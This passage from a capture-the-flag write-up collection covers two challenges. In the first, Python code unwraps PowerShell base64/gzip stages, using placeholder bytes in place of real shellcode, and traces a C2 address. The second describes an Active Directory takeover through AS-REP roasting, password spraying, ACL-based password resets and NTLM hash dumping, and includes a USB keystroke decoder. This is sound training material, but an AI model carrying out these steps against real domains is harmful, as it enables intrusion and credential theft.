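def decode_encoded_command(arg: str) -> str:
    """powershell -e / -EncodedCommand takes base64 of the script text as UTF-16LE."""
    return base64.b64decode(arg).decode("utf-16-le")


FROM_B64 = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')


def unwrap_stages(script: str) -> list:
    """Extract every FromBase64String("...") blob from a script and gunzip it when it
    starts with the gzip magic; returns the raw bytes of each embedded stage."""
    stages = []
    for blob in FROM_B64.findall(script):
        raw = base64.b64decode(blob)
        if raw[:2] == b"\x1f\x8b":          # gzip magic
            raw = gzip.decompress(raw)
        stages.append(raw)
    return stages


# Constructed stand-in for the sample's stages: placeholder bytes instead of real
# shellcode, wrapped the way the writeup describes (gzip -> base64 -> -e payload).
FAKE_SHELLCODE = b"\xfc\x48\x83\xe4\xf0\xe8"
STAGE1_SCRIPT = ('[Byte[]]$buf = [System.Convert]::FromBase64String("'
                 + base64.b64encode(gzip.compress(FAKE_SHELLCODE)).decode() + '")')
ENCODED_ARG = base64.b64encode(STAGE1_SCRIPT.encode("utf-16-le")).decode()


if __name__ == "__main__":
    expected = recover_expected_value()
    print("registry value the check expects:", expected)
    print("check passes with it:", malware_check(expected) == MAGIC_B64)
    print("single-byte keys giving printable text:", [hex(k) for k in candidate_keys()])
    stage1 = decode_encoded_command(ENCODED_ARG)
    print("stage 1 script:", stage1)
    print("stage 2 bytes:", unwrap_stages(stage1)[0].hex())
```

For the real sample, pass the value after `-e` to `decode_encoded_command` and the resulting script to `unwrap_stages`; a blob that does not start with the gzip magic is returned as-is, which is where raw shellcode would surface for the C2 analysis that follows.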

Next, we decode the second stage of the attack.

![image.png](Images/image%208.png)

We discover another base64-encoded string whose decoded bytes are compressed data. This blob carries the next payload the script is going to execute.

![image.png](Images/image%209.png)

The decompressed data is shellcode, which the script loads into a byte array and executes in memory.

```
[Byte[]]$gNu7Y = [System.Convert]::FromBase64String("...")
```

Our goal now is to retrieve the command-and-control (C2) server's IP address and port.

![image.png](Images/image%2010.png)

By loading this shellcode into Ghidra and following its logic, we can uncover the C2 server's details. This allows us to trace where the commands are coming from and, on the defensive side, to block the malware's communication with the attacker.

![image.png](Images/image%2011.png)

The IP address and port used by the C2 server are **`172.26.26.172:8181`**, providing us with the final clue needed to understand the scope of the attack and begin mitigation efforts.
-------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/rev.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/rev.exe -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/README.md: --------------------------------------------------------------------------------
**C9 - End of Rumbling**
*The fate of humanity is in your hands. The Rumbling is ending, and only the chosen one can bring peace or destruction. Uncover the hidden flags, symbols of hope, and decide the outcome of the race for humanity.*

![image.png](images/esasimage.png)
-------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/esasimage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/esasimage.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 10.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 11.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/images/image 12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C9 - End of Rumbling/images/image 12.png
-------------------------------------------------------------------------------- /Who Am I/Writeups/C9 - End of Rumbling/writeup.md: --------------------------------------------------------------------------------

# C9 - End of Rumbling

In this task we need to collect the hidden flags during the attack. First we ran an nmap scan:

![image.png](images/image.png)

The machine appears to be a domain controller for the `icsd.local` domain. From the hint, `armin.arlert` looks like a domain user. Nmap's `krb5-enum-users.nse` script can help us discover other potentially valid users.

![image.png](images/image%201.png)

Checking with impacket's `GetNPUsers`, we can see that this user is AS-REP roastable. After cracking the user's hash, the password `ocean` is obtained.

![image.png](images/image%202.png)

![image.png](images/image%203.png)

Let's enumerate all AD users with `crackmapexec` and build a user list from them.

![image.png](images/image%204.png)

It seems the user Connie has the password `Br4tSumm3r`. According to Connie's description, it is obvious that the user Jean has the same problem. Password spraying confirms that Jean has the same password as Connie.

![image.png](images/image%205.png)

![image.png](images/image%206.png)

The Jean user has read access to the "Secret Mission" share. This share contains credentials for the user levi.

![image.png](images/image%207.png)

![image.png](images/image%208.png)

Let's use BloodHound:

![image.png](images/image%209.png)

![image.png](images/image%2010.png)

We analyzed an executable with Ghidra and found an encoded credential in it.

![image.png](images/image%2011.png)

Upon analyzing the data with BloodHound, we identified that Levi has **ForceChangePassword** rights over **Zeke**. This means Levi can change Zeke's password without knowing the current one.

![image.png](images/image%2012.png)

We used this privilege to change Zeke's password and log in as him.

![image.png](images/image%2013.png)

Interestingly, Zeke had **GenericAll** privileges over **Reiner**, which allowed us to change Reiner's password as well. This opened up further access to the system.

![image.png](images/image%2014.png)

So we used it again to change the password.

![image.png](images/image%2015.png)

Further investigation of history data revealed that **Mikasa's** password had been leaked. Using her credentials, we gained access and found a **pcap** file, which we downloaded for analysis.

![image.png](images/image%2016.png)

After logging in as Mikasa, we found the pcap file and downloaded it.

![image.png](images/image%2017.png)

We started analyzing the file with tshark.

![image.png](images/image%2018.png)

The analysis revealed several keyboard events which, when decoded, provided **Eren's** password. This discovery was crucial, as Eren's credentials would lead us closer to the final objective.

[https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2](https://gist.github.com/MightyPork/6da26e382a7ad91b5496ee55fdc73db2)

![image.png](images/image%2019.png)

We decoded the following keypress events to uncover the password:

```text
0000130000000000 -> 0x13 -> p
0000040000000000 -> 0x04 -> a
0000160000000000 -> 0x16 -> s
0000160000000000 -> 0x16 -> s
00002c0000000000 -> 0x2C -> (SPACE)
00000c0000000000 -> 0x0C -> i
0000160000000000 -> 0x16 -> s
00002c0000000000 -> 0x2C -> (SPACE)
0000170000000000 -> 0x17 -> t
0000210000000000 -> 0x21 -> 4
0000170000000000 -> 0x17 -> t
0000210000000000 -> 0x21 -> 4
00000e0000000000 -> 0x0E -> k
0000210000000000 -> 0x21 -> 4
0000200000000000 -> 0x20 -> 3
0000370000000000 -> 0x37 -> .
0000280000000000 -> 0x28 -> (ENTER)
```

We used **impacket** to dump the NTLM hashes.

![image.png](images/image%2020.png)

Finally, using the administrator's credentials, we logged into the system and completed the final task.

![image.png](images/image%2021.png)
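The manual table above maps each 8-byte USB HID keyboard report to a character. The following script, an added example and not part of the original write-up, automates that decoding for a whole `usb.capdata` export: it reads the modifier byte for Shift, skips held-key repeats, handles Backspace, and is fed a constructed sample built from the reports shown above with release reports interleaved as a real capture would have them.

```python
"""Decode USB HID boot-keyboard reports (e.g. tshark -T fields -e usb.capdata) into text.

Added example for this write-up, not code from the original repository.
The SAMPLE list is constructed from the press reports shown on the page.
"""

# HID usage IDs (Keyboard/Keypad page 0x07) -> (unshifted char, shifted char)
HID_KEYS = {}
for i, c in enumerate("abcdefghijklmnopqrstuvwxyz"):
    HID_KEYS[0x04 + i] = (c, c.upper())
for i, c in enumerate("1234567890"):
    HID_KEYS[0x1E + i] = (c, "!@#$%^&*()"[i])
HID_KEYS.update({
    0x28: ("\n", "\n"), 0x2C: (" ", " "), 0x2D: ("-", "_"), 0x2E: ("=", "+"),
    0x2F: ("[", "{"), 0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"),
    0x34: ("'", '"'), 0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})
BACKSPACE = 0x2A


def parse_report(hex_report: str):
    """Split one 16-hex-char report into (modifier byte, non-zero usage IDs)."""
    raw = bytes.fromhex(hex_report)
    if len(raw) != 8:
        raise ValueError(f"expected an 8-byte boot keyboard report, got {len(raw)}")
    return raw[0], [k for k in raw[2:8] if k]   # byte 1 is reserved


def decode_reports(reports):
    """Return the typed text; a key is emitted only when it newly appears,
    so a key held across several reports is not duplicated."""
    text, previously_down = [], set()
    for rep in reports:
        mods, keys = parse_report(rep)
        shifted = bool(mods & 0x22)          # left shift 0x02, right shift 0x20
        for k in keys:
            if k in previously_down:
                continue
            if k == BACKSPACE:
                if text:
                    text.pop()
            elif k in HID_KEYS:
                text.append(HID_KEYS[k][1 if shifted else 0])
            else:
                text.append(f"<0x{k:02x}>")  # unknown usage: keep it visible
        previously_down = set(keys)
    return "".join(text)


# Constructed sample: the press reports from the write-up, each followed by the
# all-zero release report that a real capture contains between key presses.
PRESSES = ["0000130000000000", "0000040000000000", "0000160000000000", "0000160000000000",
           "00002c0000000000", "00000c0000000000", "0000160000000000", "00002c0000000000",
           "0000170000000000", "0000210000000000", "0000170000000000", "0000210000000000",
           "00000e0000000000", "0000210000000000", "0000200000000000", "0000370000000000",
           "0000280000000000"]
SAMPLE = [r for p in PRESSES for r in (p, "0000000000000000")]

if __name__ == "__main__":
    print(repr(decode_reports(SAMPLE)))
```

For a real capture, the same function can be run over the lines of `tshark -r file.pcap -Y 'usb.capdata' -T fields -e usb.capdata` after stripping any colons.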